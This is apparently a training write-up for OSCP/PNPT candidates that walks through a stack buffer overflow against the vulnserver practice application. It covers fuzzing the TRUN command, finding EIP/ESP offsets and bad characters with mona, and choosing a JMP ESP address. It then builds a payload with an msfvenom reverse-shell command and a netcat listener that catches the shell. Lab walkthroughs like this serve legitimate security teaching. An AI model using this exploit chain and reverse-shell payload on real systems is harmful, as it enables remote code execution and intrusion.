Buffer Overflow

This write-up covers buffer overflows, an indispensable topic for anyone preparing for the OSCP or PNPT. Here we walk step by step through a BOF of a vulnerable server.

Get the vulnerable server

Run the server on port 9999

Write a Python script and connect to the server

We can verify the same response from Kali with netcat:

nc 192.168.100.7 9999

Send "HELP" from the script

Output:

Here we can see the various commands we can use to check or verify the overflow.

For this test we are using the TRUN command.

Syntax for TRUN:

payload = b'TRUN /.:/' + junk

Now send junk bytes to find the approximate size at which the server crashes.

Open the application in Immunity Debugger

(Run fuzzer.py from the script to show the fuzzing)

Crashed at 2000 bytes

Running process

Send 5000 'A' characters to the process

We can see the process crashed

We can see all A's here in ESP and EIP (0x41 is the hex value of 'A')

Use a pattern generation script to create a unique pattern (Metasploit's pattern_create or mona are other options)

Length: 5000

Our unique pattern is created

Copy this pattern into the script

Now send the pattern to vulnserver from the script

Store it in a variable, e.g. pat =

We can see the server crashed

Go to ESP, right click and choose "Follow in Stack"

In the stack view, right click and copy to clipboard

009CF9C8 417A6F32 2ozA esp

Notice the EIP value, just above the ESP entry in the stack view:

009CF9C4 4B594237 7BYK EIP

Make sure the application is running

Now we will find the index of the bytes that landed in EIP and ESP

Comment out s.send(payload)

Rerun the application

Run the script

After running we can see the index numbers,

which show EIP at 2003 and ESP at 2007.

This means the value of EIP starts after 2003 bytes of 'A', and ESP starts at byte 2007.

For confirmation we will alter the script and send it:

junk = b'A' * 2003
eip = b'B' * 4
esp = b'C' * 4
junk2 = b'D' * (5000 - len(junk + eip + esp))
payload = b'TRUN /.:/' + junk + eip + esp + junk2

Make sure the application is running

After running the code the server crashed

ESP shows all C's and EIP all B's, exactly what we sent, so the offsets are verified.
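As an added Python example (not the author's script), the pattern, offset and confirmation steps above in one place. It assumes the Metasploit-style Upper/lower/digit pattern, so the dwords it produces differ from the 417A6F32 / 4B594237 shown above, which came from the author's own pattern tool; the 2003/2007 offsets are reused only as a constructed crash.

```python
# Added example, not the write-up's script: cyclic pattern, offset lookup from
# the dword Immunity shows in EIP/ESP, and the A/B/C/D confirmation buffer.
import string
import struct

MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes before the triples repeat

def cyclic_pattern(length: int) -> bytes:
    """Non-repeating Upper/lower/digit triples: Aa0Aa1...Aa9Ab0..."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern would repeat; offsets become ambiguous")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)

def pattern_offset(pattern: bytes, value):
    """Offset of a register value in the pattern; None if absent or ambiguous.
    value: debugger hex dword ("417A6F32"), int, or the raw 4 bytes. A dword is
    packed little-endian first: the text "2ozA" sits in memory as 32 6F 7A 41
    and Immunity displays it as 417A6F32."""
    if isinstance(value, str):
        value = int(value, 16)
    if isinstance(value, int):
        value = struct.pack("<I", value)
    first = pattern.find(value)
    if first == -1 or pattern.find(value, first + 1) != -1:
        return None
    return first

def register_dword(pattern: bytes, index: int) -> str:
    """Hex dword Immunity would display for the 4 pattern bytes at index."""
    return "%08X" % struct.unpack("<I", pattern[index:index + 4])[0]

def confirm_buffer(eip_off: int, esp_off: int, total: int = 5000) -> bytes:
    """A-junk, BBBB into EIP, CCCC where ESP points, D padding up to total."""
    gap = b"A" * (esp_off - eip_off - 4)  # bytes between EIP and ESP, if any
    body = b"A" * eip_off + b"B" * 4 + gap + b"C" * 4
    return body + b"D" * (total - len(body))

if __name__ == "__main__":
    pat = cyclic_pattern(5000)
    # Constructed crash reusing the write-up's offsets (2003 for EIP, 2007 for ESP).
    eip, esp = register_dword(pat, 2003), register_dword(pat, 2007)
    print(eip, pattern_offset(pat, eip), esp, pattern_offset(pat, esp))
```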

FIND BAD CHARACTERS

!mona config -set workingfolder C:\mona\%p

!mona bytearray -b "\x00"

The file is created in the working folder

Copy the characters from bytearray.txt into the script

Create a new variable allchars

Send allchars in place of the esp bytes

Run the program again

!mona compare -f C:\mona\vulnserver\bytearray.bin -a 00AAF9C8

00AAF9C8: memory address of ESP

Memory comparison result:

"Unmodified" means no additional bad characters were identified, so the only bad character is "\x00".

It lists no values, which means the only bad character is the null byte \x00, which we excluded from the start.

Restart the application

!mona jmp -r esp -cpb "\x00"

Why this is done: it finds the address of a JMP ESP instruction, excluding addresses that contain bad characters

625011AF

Update the script to use this JMP ESP address (written in little-endian byte order) as the eip value

625011AF

Since the address contains no bad characters we can safely use it

Add NOPs (2 rows, i.e. a 16-byte sled)

esp = b'\x90' * 16

esp += shellcode  # the shellcode bytes are generated in the next step

Prepare the shellcode on Kali with Metasploit

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.5 LPORT=4444 -a x86 -b "\x00" -f c

The generated shellcode (C format):

unsigned char buf[] =


Paste the shellcode into the Python script as the variable shellcode and append it to esp

esp += shellcode

Create a listener on port 4444

payload = b'TRUN /.:/' + junk + eip + esp + junk2

nc -nvlp 4444

Make sure the application is running

After executing the script, we get a reverse shell

Hope this is helpful. Happy Hacking :)

DM me if you get stuck anywhere or need help :)

Raj (CISSP | CCSP | CISA | CRISC | ISO| PMP|AWS)

Raj is a cybersecurity enthusiast, offensive security practitioner and red team member with over 10 years of experience in cyber security.